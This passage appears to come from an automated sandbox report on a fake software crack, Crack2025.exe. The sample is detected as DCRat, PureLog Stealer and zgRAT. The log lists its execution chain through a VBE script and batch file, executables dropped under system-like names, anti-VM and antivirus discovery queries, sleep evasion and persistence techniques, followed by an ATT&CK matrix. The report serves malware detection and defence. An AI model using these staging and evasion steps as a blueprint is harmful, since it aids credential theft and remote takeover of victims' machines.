                          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeMemory allocated: A00000 memory reserve | memory write watchJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeMemory allocated: 1A710000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeMemory allocated: F50000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeMemory allocated: 1AC30000 memory reserve | memory write watchJump to behavior
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeMemory allocated: AA0000 memory reserve | memory write watch
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeMemory allocated: 1A560000 memory reserve | memory write watch
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeMemory allocated: 1770000 memory reserve | memory write watch
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeMemory allocated: 1B2B0000 memory reserve | memory write watch
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeMemory allocated: 2C80000 memory reserve | memory write watch
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeMemory allocated: 1AED0000 memory reserve | memory write watch
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeMemory allocated: 2830000 memory reserve | memory write watch
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeMemory allocated: 1AAE0000 memory reserve | memory write watch
                          Source: C:\Users\Public\Pictures\Registry.exeMemory allocated: 2C10000 memory reserve | memory write watch
                          Source: C:\Users\Public\Pictures\Registry.exeMemory allocated: 1ADC0000 memory reserve | memory write watch
                          Source: C:\Users\Public\Pictures\Registry.exeMemory allocated: 14A0000 memory reserve | memory write watch
                          Source: C:\Users\Public\Pictures\Registry.exeMemory allocated: 1AFE0000 memory reserve | memory write watch
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeCode function: 35_2_00007FF7C7AE5FDC sldt word ptr [eax]35_2_00007FF7C7AE5FDC
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 599872Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 599743Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 599640Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 599523Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 599390Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 599239Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 597546Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 597425Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 597296Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeThread delayed: delay time: 922337203685477
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeThread delayed: delay time: 922337203685477
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 922337203685477
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Pictures\Registry.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Pictures\Registry.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWindow / User API: threadDelayed 2429Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZgWXldfI.logJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\AtYLDxzH.logJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\kMRvrGzk.logJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\tvkLaiES.logJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\SFAQXTUW.logJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\KbrbnaEo.logJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\biIGHMkD.logJump to dropped file
                          Source: C:\Users\user\Desktop\Crack2025.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-23796
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -600000s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -599872s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -599743s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -599640s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -599523s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -599390s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -599239s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -100000s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -99862s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -99459s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -99213s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -99094s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -98969s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -98859s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -98750s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -98638s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -98515s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -597546s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -597425s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -597296s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 9192Thread sleep time: -30000s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 8408Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe TID: 8780Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exe TID: 3148Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exe TID: 2484Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 5292Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 1388Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\Public\Pictures\Registry.exe TID: 1136Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\Public\Pictures\Registry.exe TID: 8348Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\Public\Pictures\Registry.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\Public\Pictures\Registry.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B4A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00B4A69B
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B5C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00B5C220
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B6B348 FindFirstFileExA,0_2_00B6B348
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B5E6A3 VirtualQuery,GetSystemInfo,0_2_00B5E6A3
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 599872Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 599743Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 599640Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 599523Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 599390Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 599239Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 100000Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 99862Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 99459Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 99213Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 99094Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 98969Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 98859Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 98750Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 98638Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 98515Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 597546Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 597425Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 597296Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeThread delayed: delay time: 922337203685477
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeThread delayed: delay time: 922337203685477
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 922337203685477
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Pictures\Registry.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Pictures\Registry.exeThread delayed: delay time: 922337203685477
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: wscript.exe, 00000001.00000002.1402310908.0000000002D07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}`yp5
                          Source: wscript.exe, 00000001.00000002.1402310908.0000000002D07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                          Source: ComComponentRuntimeMonitor.exe, 00000009.00000002.1492800411.000000001BC3D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ROCESS_INFORC
                          Source: ComComponentRuntimeMonitor.exe, 00000009.00000002.1492581357.000000001BC33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\u
                          Source: ComComponentRuntimeMonitor.exe, 00000009.00000002.1493029847.000000001BC4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: C:\Users\user\Desktop\Crack2025.exeAPI call chain: ExitProcess graph end nodegraph_0-23987
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B5F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B5F838
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B67DEE mov eax, dword ptr fs:[00000030h]0_2_00B67DEE
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B6C030 GetProcessHeap,0_2_00B6C030
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess token adjusted: Debug
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess token adjusted: Debug
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess token adjusted: Debug
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess token adjusted: Debug
                          Source: C:\Users\Public\Pictures\Registry.exeProcess token adjusted: Debug
                          Source: C:\Users\Public\Pictures\Registry.exeProcess token adjusted: Debug
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B5F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B5F838
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B5F9D5 SetUnhandledExceptionFilter,0_2_00B5F9D5
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B5FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00B5FBCA
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B68EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B68EBD
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeMemory allocated: page read and write | page guardJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Crtsvc\4ATaaGAsjCFOWm7aY5r6I.vbe" Jump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Crtsvc\wDGuVcXResLqCSg5nclCwVUnbT.bat" "Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Crtsvc\ComComponentRuntimeMonitor.exe "C:\Crtsvc/ComComponentRuntimeMonitor.exe"Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zmghpwjx\zmghpwjx.cmdline"Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD4D5.tmp" "c:\Windows\System32\CSCFA026A3CF3B54234ABC92E8882BC4427.TMP"Jump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B5F654 cpuid 0_2_00B5F654
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00B5AF0F
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeQueries volume information: C:\Crtsvc\ComComponentRuntimeMonitor.exe VolumeInformationJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeQueries volume information: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe VolumeInformationJump to behavior
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeQueries volume information: C:\Crtsvc\aePhPQ5epIOPbGayHv.exe VolumeInformation
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeQueries volume information: C:\Crtsvc\aePhPQ5epIOPbGayHv.exe VolumeInformation
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeQueries volume information: C:\Crtsvc\ComComponentRuntimeMonitor.exe VolumeInformation
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeQueries volume information: C:\Crtsvc\ComComponentRuntimeMonitor.exe VolumeInformation
                          Source: C:\Users\Public\Pictures\Registry.exeQueries volume information: C:\Users\Public\Pictures\Registry.exe VolumeInformation
                          Source: C:\Users\Public\Pictures\Registry.exeQueries volume information: C:\Users\Public\Pictures\Registry.exe VolumeInformation
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B5DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00B5DF1E
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B4B146 GetVersionExW,0_2_00B4B146
                          Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                          Stealing of Sensitive Information

                          barindex
                          Yara detected DCRat
                          Source: Yara matchFile source: 00000009.00000002.1485618171.00000000127BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: ComComponentRuntimeMonitor.exe PID: 8388, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: xP1x1VNeIAPjWsHHYbBFNFY.exe PID: 8668, type: MEMORYSTR
                          Yara detected PureLog Stealer
                          Source: Yara matchFile source: 9.0.ComComponentRuntimeMonitor.exe.2d0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000009.00000000.1401692601.00000000002D2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.1264146143.00000000073E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Crtsvc\ComComponentRuntimeMonitor.exe, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\smartscreen.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Default\Desktop\ShellExperienceHost.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Public\Pictures\Registry.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exe, type: DROPPED
                          Yara detected zgRAT
                          Source: Yara matchFile source: 9.0.ComComponentRuntimeMonitor.exe.2d0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Crtsvc\ComComponentRuntimeMonitor.exe, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\smartscreen.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Default\Desktop\ShellExperienceHost.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Public\Pictures\Registry.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exe, type: DROPPED

                          Remote Access Functionality

                          barindex
                          Yara detected DCRat
                          Source: Yara matchFile source: 00000009.00000002.1485618171.00000000127BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: ComComponentRuntimeMonitor.exe PID: 8388, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: xP1x1VNeIAPjWsHHYbBFNFY.exe PID: 8668, type: MEMORYSTR
                          Yara detected PureLog Stealer
                          Source: Yara matchFile source: 9.0.ComComponentRuntimeMonitor.exe.2d0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000009.00000000.1401692601.00000000002D2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.1264146143.00000000073E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Crtsvc\ComComponentRuntimeMonitor.exe, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\smartscreen.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Default\Desktop\ShellExperienceHost.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Public\Pictures\Registry.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exe, type: DROPPED
                          Yara detected zgRAT
                          Source: Yara matchFile source: 9.0.ComComponentRuntimeMonitor.exe.2d0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Crtsvc\ComComponentRuntimeMonitor.exe, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\smartscreen.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Default\Desktop\ShellExperienceHost.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Public\Pictures\Registry.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exe, type: DROPPED

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information11
                          Scripting                          		Valid Accounts231
                          Windows Management Instrumentation                          		11
                          Scripting                          		1
                          DLL Side-Loading                          		1
                          Disable or Modify Tools                          		OS Credential Dumping1
                          System Time Discovery                          		1
                          Taint Shared Content                          		1
                          Archive Collected Data                          		1
                          Web Service                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts1
                          Native API                          		1
                          DLL Side-Loading                          		11
                          Process Injection                          		1
                          Deobfuscate/Decode Files or Information                          		LSASS Memory3
                          File and Directory Discovery                          		Remote Desktop ProtocolData from Removable Media1
                          Ingress Tool Transfer                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts2
                          Command and Scripting Interpreter                          		1
                          Scheduled Task/Job                          		1
                          Scheduled Task/Job                          		3
                          Obfuscated Files or Information                          		Security Account Manager147
                          System Information Discovery                          		SMB/Windows Admin SharesData from Network Shared Drive11
                          Encrypted Channel                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal Accounts1
                          Scheduled Task/Job                          		31
                          Registry Run Keys / Startup Folder                          		31
                          Registry Run Keys / Startup Folder                          		3
                          Software Packing                          		NTDS341
                          Security Software Discovery                          		Distributed Component Object ModelInput Capture3
                          Non-Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          DLL Side-Loading                          		LSA Secrets1
                          Process Discovery                          		SSHKeylogging4
